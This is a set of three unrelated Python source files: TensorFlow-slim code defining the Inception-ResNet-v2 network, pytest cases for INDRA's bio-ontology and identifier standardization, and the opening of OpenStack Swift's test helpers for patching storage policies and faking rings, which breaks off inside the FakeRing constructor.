def block35(net, scale=1.0, activation_fn=tf.nn.relu, scope=None, reuse=None):
  """Builds the 35x35 resnet block."""
  with tf.variable_scope(scope, 'Block35', [net], reuse=reuse):
    # Three parallel branches of increasing receptive field.
    with tf.variable_scope('Branch_0'):
      branch0 = slim.conv2d(net, 32, 1, scope='Conv2d_1x1')
    with tf.variable_scope('Branch_1'):
      branch1 = slim.conv2d(net, 32, 1, scope='Conv2d_0a_1x1')
      branch1 = slim.conv2d(branch1, 32, 3, scope='Conv2d_0b_3x3')
    with tf.variable_scope('Branch_2'):
      branch2 = slim.conv2d(net, 32, 1, scope='Conv2d_0a_1x1')
      branch2 = slim.conv2d(branch2, 48, 3, scope='Conv2d_0b_3x3')
      branch2 = slim.conv2d(branch2, 64, 3, scope='Conv2d_0c_3x3')
    mixed = tf.concat(axis=3, values=[branch0, branch1, branch2])
    # Linear 1x1 conv projects back to the input depth so the scaled
    # residual can be added to `net`.
    up = slim.conv2d(mixed, net.get_shape()[3], 1, normalizer_fn=None,
                     activation_fn=None, scope='Conv2d_1x1')
    net += scale * up
    if activation_fn:
      net = activation_fn(net)
  return net
# Inception-Renset-B
def block17(net, scale=1.0, activation_fn=tf.nn.relu, scope=None, reuse=None):
  """Builds the 17x17 resnet block."""
  with tf.variable_scope(scope, 'Block17', [net], reuse=reuse):
    # Two parallel branches: a 1x1 projection and a factorized 7x7 conv.
    with tf.variable_scope('Branch_0'):
      branch0 = slim.conv2d(net, 192, 1, scope='Conv2d_1x1')
    with tf.variable_scope('Branch_1'):
      branch1 = slim.conv2d(net, 128, 1, scope='Conv2d_0a_1x1')
      branch1 = slim.conv2d(branch1, 160, [1, 7], scope='Conv2d_0b_1x7')
      branch1 = slim.conv2d(branch1, 192, [7, 1], scope='Conv2d_0c_7x1')
    mixed = tf.concat(axis=3, values=[branch0, branch1])
    # Linear 1x1 conv restores the input depth for the residual sum.
    up = slim.conv2d(mixed, net.get_shape()[3], 1, normalizer_fn=None,
                     activation_fn=None, scope='Conv2d_1x1')
    net += scale * up
    if activation_fn:
      net = activation_fn(net)
  return net
# Inception-Resnet-C
def block8(net, scale=1.0, activation_fn=tf.nn.relu, scope=None, reuse=None):
  """Builds the 8x8 resnet block."""
  with tf.variable_scope(scope, 'Block8', [net], reuse=reuse):
    # Two parallel branches: a 1x1 projection and a factorized 3x3 conv.
    with tf.variable_scope('Branch_0'):
      branch0 = slim.conv2d(net, 192, 1, scope='Conv2d_1x1')
    with tf.variable_scope('Branch_1'):
      branch1 = slim.conv2d(net, 192, 1, scope='Conv2d_0a_1x1')
      branch1 = slim.conv2d(branch1, 224, [1, 3], scope='Conv2d_0b_1x3')
      branch1 = slim.conv2d(branch1, 256, [3, 1], scope='Conv2d_0c_3x1')
    mixed = tf.concat(axis=3, values=[branch0, branch1])
    # Linear 1x1 conv restores the input depth for the residual sum.
    up = slim.conv2d(mixed, net.get_shape()[3], 1, normalizer_fn=None,
                     activation_fn=None, scope='Conv2d_1x1')
    net += scale * up
    if activation_fn:
      net = activation_fn(net)
  return net
def inference(images, keep_probability, phase_train=True, weight_decay=0.0, reuse=None):
  """Builds Inception-ResNet-v2 under the shared conv2d arg scope
  (truncated-normal init, L2 regularization, batch norm)."""
  batch_norm_params = {
      'decay': 0.995,               # Decay for the moving averages.
      'epsilon': 0.001,             # Epsilon to prevent 0s in variance.
      'updates_collections': None,  # Force in-place mean/variance updates.
      # Moving averages end up in the trainable variables collection.
      'variables_collections': [tf.GraphKeys.TRAINABLE_VARIABLES],
  }
  with slim.arg_scope(
      [slim.conv2d],
      weights_initializer=tf.truncated_normal_initializer(stddev=0.1),
      weights_regularizer=slim.l2_regularizer(weight_decay),
      normalizer_fn=slim.batch_norm,
      normalizer_params=batch_norm_params):
    return inception_resnet_v2(images, is_training=phase_train,
                               dropout_keep_prob=keep_probability, reuse=reuse)
def inception_resnet_v2(inputs, is_training=True,
                        dropout_keep_prob=0.8,
                        reuse=None,
                        scope='InceptionResnetV2'):
  """Creates the Inception Resnet V2 model.
  Args:
    inputs: a 4-D tensor of size [batch_size, height, width, 3].
    is_training: whether is training or not.
    dropout_keep_prob: float, the fraction to keep before final layer.
    reuse: whether or not the network and its variables should be reused. To be
      able to reuse 'scope' must be given.
    scope: Optional variable_scope.
  Returns:
    net: the flattened pre-logits activations (no classification layer is
      built here, despite the 'Logits' scope name).
    end_points: the set of end_points from the inception model.
  """
  end_points = {}
  with tf.variable_scope(scope, 'InceptionResnetV2', [inputs], reuse=reuse):
    with slim.arg_scope([slim.batch_norm, slim.dropout],
                        is_training=is_training):
      with slim.arg_scope([slim.conv2d, slim.max_pool2d, slim.avg_pool2d],
                          stride=1, padding='SAME'):
        # Stem: plain convolutions/pools downsampling 299x299 input.
        # 149 x 149 x 32
        net = slim.conv2d(inputs, 32, 3, stride=2, padding='VALID',
                          scope='Conv2d_1a_3x3')
        end_points['Conv2d_1a_3x3'] = net
        # 147 x 147 x 32
        net = slim.conv2d(net, 32, 3, padding='VALID',
                          scope='Conv2d_2a_3x3')
        end_points['Conv2d_2a_3x3'] = net
        # 147 x 147 x 64
        net = slim.conv2d(net, 64, 3, scope='Conv2d_2b_3x3')
        end_points['Conv2d_2b_3x3'] = net
        # 73 x 73 x 64
        net = slim.max_pool2d(net, 3, stride=2, padding='VALID',
                              scope='MaxPool_3a_3x3')
        end_points['MaxPool_3a_3x3'] = net
        # 73 x 73 x 80
        net = slim.conv2d(net, 80, 1, padding='VALID',
                          scope='Conv2d_3b_1x1')
        end_points['Conv2d_3b_1x1'] = net
        # 71 x 71 x 192
        net = slim.conv2d(net, 192, 3, padding='VALID',
                          scope='Conv2d_4a_3x3')
        end_points['Conv2d_4a_3x3'] = net
        # 35 x 35 x 192
        net = slim.max_pool2d(net, 3, stride=2, padding='VALID',
                              scope='MaxPool_5a_3x3')
        end_points['MaxPool_5a_3x3'] = net
        # Mixed_5b: four-branch inception module.
        # 35 x 35 x 320
        with tf.variable_scope('Mixed_5b'):
          with tf.variable_scope('Branch_0'):
            tower_conv = slim.conv2d(net, 96, 1, scope='Conv2d_1x1')
          with tf.variable_scope('Branch_1'):
            tower_conv1_0 = slim.conv2d(net, 48, 1, scope='Conv2d_0a_1x1')
            tower_conv1_1 = slim.conv2d(tower_conv1_0, 64, 5,
                                        scope='Conv2d_0b_5x5')
          with tf.variable_scope('Branch_2'):
            tower_conv2_0 = slim.conv2d(net, 64, 1, scope='Conv2d_0a_1x1')
            tower_conv2_1 = slim.conv2d(tower_conv2_0, 96, 3,
                                        scope='Conv2d_0b_3x3')
            tower_conv2_2 = slim.conv2d(tower_conv2_1, 96, 3,
                                        scope='Conv2d_0c_3x3')
          with tf.variable_scope('Branch_3'):
            tower_pool = slim.avg_pool2d(net, 3, stride=1, padding='SAME',
                                         scope='AvgPool_0a_3x3')
            tower_pool_1 = slim.conv2d(tower_pool, 64, 1,
                                       scope='Conv2d_0b_1x1')
          net = tf.concat(axis=3, values=[tower_conv, tower_conv1_1,
                                          tower_conv2_2, tower_pool_1])
        end_points['Mixed_5b'] = net
        # 10 residual Inception-ResNet-A blocks.
        net = slim.repeat(net, 10, block35, scale=0.17)
        # Mixed_6a: reduction module down to 17x17.
        # 17 x 17 x 1024
        with tf.variable_scope('Mixed_6a'):
          with tf.variable_scope('Branch_0'):
            tower_conv = slim.conv2d(net, 384, 3, stride=2, padding='VALID',
                                     scope='Conv2d_1a_3x3')
          with tf.variable_scope('Branch_1'):
            tower_conv1_0 = slim.conv2d(net, 256, 1, scope='Conv2d_0a_1x1')
            tower_conv1_1 = slim.conv2d(tower_conv1_0, 256, 3,
                                        scope='Conv2d_0b_3x3')
            tower_conv1_2 = slim.conv2d(tower_conv1_1, 384, 3,
                                        stride=2, padding='VALID',
                                        scope='Conv2d_1a_3x3')
          with tf.variable_scope('Branch_2'):
            tower_pool = slim.max_pool2d(net, 3, stride=2, padding='VALID',
                                         scope='MaxPool_1a_3x3')
          net = tf.concat(axis=3, values=[tower_conv, tower_conv1_2, tower_pool])
        end_points['Mixed_6a'] = net
        # 20 residual Inception-ResNet-B blocks.
        net = slim.repeat(net, 20, block17, scale=0.10)
        # Mixed_7a: reduction module down to 8x8.
        with tf.variable_scope('Mixed_7a'):
          with tf.variable_scope('Branch_0'):
            tower_conv = slim.conv2d(net, 256, 1, scope='Conv2d_0a_1x1')
            tower_conv_1 = slim.conv2d(tower_conv, 384, 3, stride=2,
                                       padding='VALID', scope='Conv2d_1a_3x3')
          with tf.variable_scope('Branch_1'):
            tower_conv1 = slim.conv2d(net, 256, 1, scope='Conv2d_0a_1x1')
            tower_conv1_1 = slim.conv2d(tower_conv1, 288, 3, stride=2,
                                        padding='VALID', scope='Conv2d_1a_3x3')
          with tf.variable_scope('Branch_2'):
            tower_conv2 = slim.conv2d(net, 256, 1, scope='Conv2d_0a_1x1')
            tower_conv2_1 = slim.conv2d(tower_conv2, 288, 3,
                                        scope='Conv2d_0b_3x3')
            tower_conv2_2 = slim.conv2d(tower_conv2_1, 320, 3, stride=2,
                                        padding='VALID', scope='Conv2d_1a_3x3')
          with tf.variable_scope('Branch_3'):
            tower_pool = slim.max_pool2d(net, 3, stride=2, padding='VALID',
                                         scope='MaxPool_1a_3x3')
          net = tf.concat(axis=3, values=[tower_conv_1, tower_conv1_1,
                                          tower_conv2_2, tower_pool])
        end_points['Mixed_7a'] = net
        # 9 residual Inception-ResNet-C blocks, plus one with no activation.
        net = slim.repeat(net, 9, block8, scale=0.20)
        net = block8(net, activation_fn=None)
        net = slim.conv2d(net, 1536, 1, scope='Conv2d_7b_1x1')
        end_points['Conv2d_7b_1x1'] = net
        with tf.variable_scope('Logits'):
          end_points['PrePool'] = net
          #pylint: disable=no-member
          net = slim.avg_pool2d(net, net.get_shape()[1:3], padding='VALID',
                                scope='AvgPool_1a_8x8')
          net = slim.flatten(net)
          net = slim.dropout(net, dropout_keep_prob, is_training=is_training,
                             scope='Dropout')
          end_points['PreLogitsFlatten'] = net
  return net, end_points
|
|
from indra.statements import Agent
from indra.ontology.bio import bio_ontology
from indra.databases import go_client, hgnc_client
from indra.ontology.standardize import \
standardize_agent_name, standardize_db_refs, standardize_name_db_refs
def test_isa_entity():
    """isa holds from a specific HGNC gene up to the FPLX RAF family."""
    assert bio_ontology.isa('HGNC', '1097', 'FPLX', 'RAF')
def test_isa_entity2():
    """isa does not hold between two distinct HGNC genes."""
    assert not bio_ontology.isa('HGNC', '1097', 'HGNC', '646')
def test_isa_entity3():
    """isa is directional: family -> gene must not hold."""
    assert not bio_ontology.isa('FPLX', 'RAF', 'HGNC', '1097')
def test_partof_entity():
    """partof holds between nested FPLX families (HIF_alpha in HIF)."""
    assert bio_ontology.partof('FPLX', 'HIF_alpha', 'FPLX', 'HIF')
def test_isa_or_partof_entity():
    """isa_or_partof holds from an HGNC gene to the FPLX AMPK complex."""
    assert bio_ontology.isa_or_partof('HGNC', '9385', 'FPLX', 'AMPK')
def test_partof_entity_not():
    """partof is directional: HIF1 is not part of HIF_alpha."""
    assert not bio_ontology.partof('FPLX', 'HIF1', 'FPLX', 'HIF_alpha')
def test_isa_mod():
    """Phosphorylation isa modification in the INDRA_MODS hierarchy."""
    assert bio_ontology.isa('INDRA_MODS', 'phosphorylation',
                            'INDRA_MODS', 'modification')
def test_isa_mod_not():
    """Sibling modification types are not related by isa."""
    assert not bio_ontology.isa('INDRA_MODS', 'phosphorylation',
                                'INDRA_MODS', 'ubiquitination')
def test_isa_activity():
    """Kinase isa activity in the INDRA_ACTIVITIES hierarchy."""
    assert bio_ontology.isa('INDRA_ACTIVITIES', 'kinase',
                            'INDRA_ACTIVITIES', 'activity')
def test_isa_activity_not():
    """Sibling activity types are not related by isa."""
    assert not bio_ontology.isa('INDRA_ACTIVITIES', 'kinase',
                                'INDRA_ACTIVITIES', 'phosphatase')
def test_partof_comp():
    """Cytoplasm is (transitively) part of cellular_component in GO."""
    assert bio_ontology.isa_or_partof(
        'GO', go_client.get_go_id_from_label('cytoplasm'),
        'GO', go_client.get_go_id_from_label('cellular_component'))
def test_partof_comp_not():
    """isa_or_partof over GO is directional."""
    assert not bio_ontology.isa_or_partof(
        'GO', go_client.get_go_id_from_label('cellular_component'),
        'GO', go_client.get_go_id_from_label('cytoplasm'))
def test_get_children():
    """get_children returns lists of the expected sizes for families/genes."""
    rafs = bio_ontology.get_children('FPLX', 'RAF')
    assert isinstance(rafs, list), rafs
    assert len(rafs) == 3, rafs
    # a leaf gene has no children
    brafs = bio_ontology.get_children('HGNC', hgnc_client.get_hgnc_id('BRAF'))
    assert isinstance(brafs, list), brafs
    assert len(brafs) == 0
    mapks = bio_ontology.get_children('FPLX', 'MAPK')
    assert len(mapks) == 12, mapks
    ampks = bio_ontology.get_children('FPLX', 'AMPK')
    assert len(ampks) == 22, ampks
def test_mtorc_children():
    """mTORC1/mTORC2 members must not cross over (RICTOR vs RPTOR)."""
    ch1 = bio_ontology.get_children('FPLX', 'mTORC1')
    ch2 = bio_ontology.get_children('FPLX', 'mTORC2')
    assert ('HGNC', hgnc_client.get_hgnc_id('RICTOR')) not in ch1
    assert ('HGNC', hgnc_client.get_hgnc_id('RPTOR')) not in ch2
def test_mtorc_get_parents():
    """RICTOR's only parent is the FPLX mTORC2 complex."""
    p = bio_ontology.get_parents('HGNC', hgnc_client.get_hgnc_id('RICTOR'))
    assert len(p) == 1
    assert p == [('FPLX', 'mTORC2')]
def test_mtorc_transitive_closure():
    """partof closure holds for RICTOR/mTORC2 but not RPTOR/mTORC2."""
    assert bio_ontology.partof('HGNC', hgnc_client.get_hgnc_id('RICTOR'),
                               'FPLX', 'mTORC2')
    assert not bio_ontology.partof('HGNC', hgnc_client.get_hgnc_id('RPTOR'),
                                   'FPLX', 'mTORC2')
def test_erk_isa():
    """HGNC:6871 isa the MAPK family but not the JNK family."""
    assert bio_ontology.isa('HGNC', '6871', 'FPLX', 'MAPK')
    assert not bio_ontology.isa('HGNC', '6871', 'FPLX', 'JNK')
def test_get_parents():
    """get_parents returns all transitive parents, including FPLX AMPK."""
    prkaa1 = ('HGNC', '9376')
    ampk = ('FPLX', 'AMPK')
    p1 = bio_ontology.get_parents(*prkaa1)
    assert len(p1) == 8, p1
    assert ampk in p1
    # FIXME: implement these
    # p2 = ent_hierarchy.get_parents(prkaa1, 'immediate')
    # assert len(p2) == 7, p2
    # This is to make sure we're getting an URI string
    # assert unicode_strs(p2)
    # assert ampk not in p2
    # p3 = ent_hierarchy.get_parents(prkaa1, 'top')
    # assert len(p3) == 1, p3
    # assert ampk in p3
def test_chebi_isa():
    """isa holds between two related CHEBI chemical entries."""
    assert bio_ontology.isa('CHEBI', 'CHEBI:87307', 'CHEBI', 'CHEBI:36962')
# FIXME: implement components
# def test_same_components():
#     uri_prkag1 = ent_hierarchy.get_uri('HGNC', '9385')  # PRKAG1
#     uri_ampk = ent_hierarchy.get_uri('FPLX', 'AMPK')
#
#     c1 = ent_hierarchy.components[uri_prkag1]
#     c2 = ent_hierarchy.components[uri_ampk]
#     assert c1 == c2
def test_name_standardize_hgnc_up():
    """Agent names standardize from HGNC/UP ids (human and mouse forms)."""
    a1 = Agent('x', db_refs={'HGNC': '9387'})
    standardize_agent_name(a1, True)
    assert a1.name == 'PRKAG3'
    a1 = Agent('x', db_refs={'UP': 'Q9UGI9'})
    standardize_agent_name(a1, True)
    assert a1.name == 'PRKAG3'
    # non-human UP id yields the species-cased symbol
    a1 = Agent('x', db_refs={'UP': 'Q8BGM7'})
    standardize_agent_name(a1, True)
    assert a1.name == 'Prkag3'
def test_name_standardize_chebi():
    """Agent names standardize from a CHEBI id."""
    a1 = Agent('x', db_refs={'CHEBI': 'CHEBI:15996'})
    standardize_agent_name(a1, False)
    assert a1.name == 'GTP'
def test_name_standardize_go():
    """Agent names standardize from a GO id."""
    a1 = Agent('x', db_refs={'GO': 'GO:0006915'})
    standardize_agent_name(a1, False)
    assert a1.name == 'apoptotic process'
def test_name_standardize_mesh():
    """Agent names standardize from a MESH id."""
    a1 = Agent('x', db_refs={'MESH': 'D008545'})
    standardize_agent_name(a1, False)
    assert a1.name == 'Melanoma', a1.name
def test_name_standardize_mesh_go():
    """MESH<->GO mappings are added and the name standardizes both ways."""
    a1 = Agent('x', db_refs={'MESH': 'D058750'})
    standardize_agent_name(a1, True)
    assert a1.db_refs['GO'] == 'GO:0001837'
    assert a1.name == 'epithelial to mesenchymal transition', a1.name
    a1 = Agent('x', db_refs={'GO': 'GO:0001837'})
    standardize_agent_name(a1, True)
    assert a1.db_refs['MESH'] == 'D058750'
    assert a1.name == 'epithelial to mesenchymal transition', a1.name
def test_name_standardize_mesh_other_db():
    """MESH ids map onto CHEBI/HGNC/UP refs and names follow the mapping."""
    a1 = Agent('x', db_refs={'MESH': 'D001194'})
    standardize_agent_name(a1, True)
    assert a1.db_refs['CHEBI'] == 'CHEBI:46661'
    assert a1.name == 'asbestos', a1.name
    db_refs = {'MESH': 'D000067777'}
    db_refs = standardize_db_refs(db_refs)
    assert db_refs.get('HGNC') == '3313', db_refs
    assert db_refs.get('UP') == 'Q12926', db_refs
    a2 = Agent('x', db_refs=db_refs)
    standardize_agent_name(a2)
    assert a2.name == 'ELAVL2'
def test_standardize_db_refs_efo_hp_doid():
    """EFO/HP/DOID map to and from MESH via standardize_db_refs."""
    refs = standardize_db_refs({'EFO': '0009502'})
    assert refs.get('MESH') == 'D000007', refs
    refs = standardize_db_refs({'MESH': 'D000007'})
    assert refs.get('EFO') == '0009502', refs
    refs = standardize_db_refs({'HP': 'HP:0031801'})
    assert refs.get('MESH') == 'D064706', refs
    refs = standardize_db_refs({'MESH': 'D064706'})
    assert refs.get('HP') == 'HP:0031801', refs
    # Currently there is no one-to-many mapping in the direction towards MeSH
    # (there used to be) if there is again, we should test it here
    #refs = standardize_db_refs({'DOID': 'DOID:0060695'})
    #assert 'MESH' not in refs
    # One-to-many mappings away from MESH
    refs = standardize_db_refs({'MESH': 'D000071017'})
    assert 'DOID' not in refs
    refs = standardize_db_refs({'DOID': 'DOID:0060495'})
    assert refs.get('MESH') == 'D000067208'
    # This is an xrefs-based mapping that isn't in Gilda's resource file
    refs = standardize_db_refs({'EFO': '0000694'})
    assert refs.get('MESH') == 'D045169'
def test_standardize_name_efo_hp_doid():
    """Names resolve via the MESH mapping when present, else natively."""
    ag = Agent('x', db_refs={'HP': 'HP:0031801'})
    standardize_agent_name(ag)
    # Name based on MESH mapping
    assert ag.name == 'Vocal Cord Dysfunction'
    ag = Agent('x', db_refs={'HP': 'HP:0000002'})
    standardize_agent_name(ag)
    # Name based on HP itself
    assert ag.name == 'Abnormality of body height'
    ag = Agent('x', db_refs={'DOID': 'DOID:0014667'})
    standardize_agent_name(ag)
    # Name based on MESH mapping
    assert ag.name == 'Metabolic Diseases'
    ag = Agent('x', db_refs={'EFO': '1002050'})
    standardize_agent_name(ag)
    # Name based on MESH mapping
    assert ag.name == 'Nephritis', (ag.name, ag.db_refs)
    ag = Agent('x', db_refs={'EFO': '0000001'})
    standardize_agent_name(ag)
    # Name based on EFO itself
    assert ag.name == 'experimental factor', (ag.name, ag.db_refs)
def test_standardize_uppro():
    """A UPPRO (protein chain) ref takes naming priority over plain UP."""
    ag = Agent('x', db_refs={'UP': 'P01019'})
    standardize_agent_name(ag)
    assert ag.name == 'AGT'
    ag = Agent('x', db_refs={'UPPRO': 'PRO_0000032458'})
    standardize_agent_name(ag)
    assert ag.name == 'Angiotensin-2', ag.name
    ag = Agent('x', db_refs={'UPPRO': 'PRO_0000032458', 'UP': 'P01019'})
    standardize_agent_name(ag)
    assert ag.name == 'Angiotensin-2', ag.name
def test_uppro_fallback():
    # This UP chain has no name currently so we can test that the fallback
    # to naming by the UP ID is working
    ag = Agent('x', db_refs={'UP': 'Q6IE75', 'UPPRO': 'PRO_0000383648'})
    standardize_agent_name(ag)
    assert ag.name == 'Bace2'
def test_mirna_standardize():
    """HGNC<->MIRBASE mappings are added and names standardize."""
    name, db_refs = standardize_name_db_refs({'HGNC': '31476'})
    assert db_refs['HGNC'] == '31476'
    assert db_refs['MIRBASE'] == 'MI0000060'
    assert name == 'MIRLET7A1'
    name, db_refs = standardize_name_db_refs({'MIRBASE': 'MI0001730'})
    assert db_refs['MIRBASE'] == 'MI0001730'
    assert name == 'mmu-mir-451a'
def test_drugbank_mappings():
    """DRUGBANK maps to CHEBI/CHEMBL; ns_order controls which name wins."""
    name, db_refs = standardize_name_db_refs({'DRUGBANK': 'DB00001'})
    assert db_refs.get('CHEBI') == 'CHEBI:142437', db_refs
    assert db_refs.get('CHEMBL') == 'CHEMBL1201666', db_refs
    assert name == 'lepirudin'
    # Here we test for alternative prioritization of name spaces
    name, db_refs = standardize_name_db_refs({'DRUGBANK': 'DB00001'},
                                             ns_order=['DRUGBANK', 'CHEBI'])
    # We expect to get the Drugbank standard name
    assert name == 'Lepirudin'
def test_standardize_up_isoform():
    """UP isoform suffixes are preserved while HGNC/EGID refs are added."""
    refs = standardize_db_refs({'UP': 'Q99490'})
    assert refs == {'UP': 'Q99490', 'HGNC': '16921',
                    'EGID': '116986'}, refs
    refs = standardize_db_refs({'UP': 'Q99490-123'})
    assert refs == {'UP': 'Q99490-123', 'HGNC': '16921',
                    'EGID': '116986'}, refs
def test_standardize_chembl():
    """A CHEMBL ref is added when standardizing from DRUGBANK."""
    db_refs = standardize_db_refs({'DRUGBANK': 'DB00305'})
    assert 'CHEMBL' in db_refs, db_refs
    assert db_refs['CHEMBL'] == 'CHEMBL105', db_refs
def test_efo_bfo_relations():
    """An EFO term has both BFO and EFO parents."""
    assert set(bio_ontology.get_parents('EFO', '0004542')) == \
        {('BFO', '0000015'), ('EFO', '0000001')}
def test_name_lookup_obsolete():
    # This is a regression test to make sure we don't return another node
    # with the same name but which is obsolete (HGNC:11093)
    assert bio_ontology.get_id_from_name('HGNC', 'ALDH3A2') == \
        ('HGNC', '403')
def test_chebi_refinements():
    """CHEBI partof refinements are directional."""
    assert bio_ontology.partof('CHEBI', 'CHEBI:136692',
                               'CHEBI', 'CHEBI:365')
    assert not bio_ontology.partof('CHEBI', 'CHEBI:365',
                                   'CHEBI', 'CHEBI:136692')
def test_standardize_hgnc_fplx_mesh_bug():
    """Gene-level and family-level refs must not leak into each other."""
    refs = standardize_db_refs({'HGNC': '1514'})
    assert refs['UP'] == 'P41180'
    assert 'FPLX' not in refs
    refs = standardize_db_refs({'FPLX': 'Calcium_sensing_receptors'})
    assert refs['HGNC_GROUP'] == '279'
    assert 'HGNC' not in refs
def test_ido_parents():
    """An IDO term has the expected IDO parent."""
    parents = bio_ontology.get_parents('IDO', '0000514')
    assert ('IDO', '0000509') in parents
def test_lspci():
    """LSPCI nodes have names and cross-namespace member children."""
    assert bio_ontology.get_name('LSPCI', '18') == 'Pentane-1,5-Diamine'
    members = bio_ontology.get_children('LSPCI', '18')
    # These are some of the members, not all
    expected_members = {('CAS', '462-94-2'),
                        ('CHEBI', 'CHEBI:18127'),
                        ('CHEMBL', 'CHEMBL119296'),
                        ('PUBCHEM', '273')}
    assert expected_members < set(members)
def test_nonhuman_entrez():
    """A non-human Entrez id standardizes to its species symbol and UP id."""
    name, db_refs = standardize_name_db_refs({'EGID': '109880'})
    assert name == 'Braf', name
    assert db_refs['UP'] == 'P28028', db_refs
def test_pubchem_mesh():
    """A PUBCHEM CID maps to its MESH supplementary record."""
    db_refs = standardize_db_refs({'PUBCHEM': '56649450'})
    assert db_refs.get('MESH') == 'C585539'
|
|
# Copyright (c) 2010-2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Swift tests """
from __future__ import print_function
import os
import copy
import logging
import errno
from six.moves import range
import sys
from contextlib import contextmanager, closing
from collections import defaultdict, Iterable
import itertools
from numbers import Number
from tempfile import NamedTemporaryFile
import time
import eventlet
from eventlet.green import socket
from tempfile import mkdtemp
from shutil import rmtree
import signal
import json
from swift.common.utils import Timestamp, NOTICE
from test import get_config
from swift.common import utils
from swift.common.header_key_dict import HeaderKeyDict
from swift.common.ring import Ring, RingData
from hashlib import md5
import logging.handlers
from six.moves.http_client import HTTPException
from swift.common import storage_policy
from swift.common.storage_policy import (StoragePolicy, ECStoragePolicy,
VALID_EC_TYPES)
import functools
import six.moves.cPickle as pickle
from gzip import GzipFile
import mock as mocklib
import inspect
from nose import SkipTest
# MD5 hexdigest of the empty string
EMPTY_ETAG = md5().hexdigest()
# try not to import this module from swift
if not os.path.basename(sys.argv[0]).startswith('swift'):
    # never patch HASH_PATH_SUFFIX AGAIN!
    utils.HASH_PATH_SUFFIX = 'endcap'
# pick the first locally-available erasure-coding backend in this order
EC_TYPE_PREFERENCE = [
    'liberasurecode_rs_vand',
    'jerasure_rs_vand',
]
for eclib_name in EC_TYPE_PREFERENCE:
    if eclib_name in VALID_EC_TYPES:
        break
else:
    # for/else: none of the preferred EC implementations is installed
    raise SystemExit('ERROR: unable to find suitable PyECLib type'
                     ' (none of %r found in %r)' % (
                         EC_TYPE_PREFERENCE,
                         VALID_EC_TYPES,
                     ))
DEFAULT_TEST_EC_TYPE = eclib_name
def patch_policies(thing_or_policies=None, legacy_only=False,
                   with_ec_default=False, fake_ring_args=None):
    """Patch the global storage policy collection for a test.

    Usable as a bare decorator, called with an explicit policy iterable,
    or called with the ``legacy_only``/``with_ec_default`` presets.
    ``fake_ring_args`` supplies per-policy FakeRing constructor kwargs.
    """
    # An explicit iterable/collection of policies short-circuits straight
    # to a PatchPolicies decorator built around it.
    if isinstance(thing_or_policies,
                  (Iterable, storage_policy.StoragePolicyCollection)):
        return PatchPolicies(thing_or_policies, fake_ring_args=fake_ring_args)
    # Otherwise choose one of the canned policy presets.
    if legacy_only:
        preset_policies = [StoragePolicy(0, name='legacy', is_default=True)]
        preset_ring_args = [{}]
    elif with_ec_default:
        preset_policies = [
            ECStoragePolicy(0, name='ec', is_default=True,
                            ec_type=DEFAULT_TEST_EC_TYPE, ec_ndata=10,
                            ec_nparity=4, ec_segment_size=4096),
            StoragePolicy(1, name='unu'),
        ]
        preset_ring_args = [{'replicas': 14}, {}]
    else:
        preset_policies = [
            StoragePolicy(0, name='nulo', is_default=True),
            StoragePolicy(1, name='unu'),
        ]
        preset_ring_args = [{}, {}]
    decorator = PatchPolicies(
        preset_policies, fake_ring_args=fake_ring_args or preset_ring_args)
    # Bare decorator usage vs. direct decoration of a class/function.
    if thing_or_policies:
        # it's a thing, we return the wrapped thing instead of the decorator
        return decorator(thing_or_policies)
    return decorator
class PatchPolicies(object):
    """
    Why not mock.patch? In my case, when used as a decorator on the class it
    seemed to patch setUp at the wrong time (i.e. in setup the global wasn't
    patched yet)
    """
    def __init__(self, policies, fake_ring_args=None):
        # accept either a ready-made collection or a plain list of policies
        if isinstance(policies, storage_policy.StoragePolicyCollection):
            self.policies = policies
        else:
            self.policies = storage_policy.StoragePolicyCollection(policies)
        # one FakeRing kwargs dict per policy; None means "leave ring alone"
        self.fake_ring_args = fake_ring_args or [None] * len(self.policies)
    def _setup_rings(self):
        """
        Our tests tend to use the policies rings like their own personal
        playground - which can be a problem in the particular case of a
        patched TestCase class where the FakeRing objects are scoped in the
        call to the patch_policies wrapper outside of the TestCase instance
        which can lead to some bled state.
        To help tests get better isolation without having to think about it,
        here we're capturing the args required to *build* a new FakeRing
        instances so we can ensure each test method gets a clean ring setup.
        The TestCase can always "tweak" these fresh rings in setUp - or if
        they'd prefer to get the same "reset" behavior with custom FakeRing's
        they can pass in their own fake_ring_args to patch_policies instead of
        setting the object_ring on the policy definitions.
        """
        for policy, fake_ring_arg in zip(self.policies, self.fake_ring_args):
            if fake_ring_arg is not None:
                policy.object_ring = FakeRing(**fake_ring_arg)
    def __call__(self, thing):
        # decorator usage: dispatch on class vs. plain function
        if isinstance(thing, type):
            return self._patch_class(thing)
        else:
            return self._patch_method(thing)
    def _patch_class(self, cls):
        """
        Creating a new class that inherits from decorated class is the more
        common way I've seen class decorators done - but it seems to cause
        infinite recursion when super is called from inside methods in the
        decorated class.
        """
        orig_setUp = cls.setUp
        orig_tearDown = cls.tearDown
        def setUp(cls_self):
            # capture the global BEFORE patching so tearDown can restore it
            self._orig_POLICIES = storage_policy._POLICIES
            # guard so a subclass setUp chain only patches once per instance
            if not getattr(cls_self, '_policies_patched', False):
                storage_policy._POLICIES = self.policies
                self._setup_rings()
                cls_self._policies_patched = True
            orig_setUp(cls_self)
        def tearDown(cls_self):
            orig_tearDown(cls_self)
            # restore the global policy collection captured in setUp
            storage_policy._POLICIES = self._orig_POLICIES
        cls.setUp = setUp
        cls.tearDown = tearDown
        return cls
    def _patch_method(self, f):
        @functools.wraps(f)
        def mywrapper(*args, **kwargs):
            self._orig_POLICIES = storage_policy._POLICIES
            try:
                storage_policy._POLICIES = self.policies
                self._setup_rings()
                return f(*args, **kwargs)
            finally:
                storage_policy._POLICIES = self._orig_POLICIES
        return mywrapper
    def __enter__(self):
        # context-manager usage patches the global but does NOT rebuild rings
        self._orig_POLICIES = storage_policy._POLICIES
        storage_policy._POLICIES = self.policies
    def __exit__(self, *args):
        storage_policy._POLICIES = self._orig_POLICIES
class FakeRing(Ring):
    """In-memory Ring stand-in: one fake device per replica, no file I/O."""
    def __init__(self, replicas=3, max_more_nodes=0, part_power=0,
                 base_port=1000):
        # NOTE: deliberately does not call Ring.__init__ (no ring file)
        self._base_port = base_port
        self.max_more_nodes = max_more_nodes
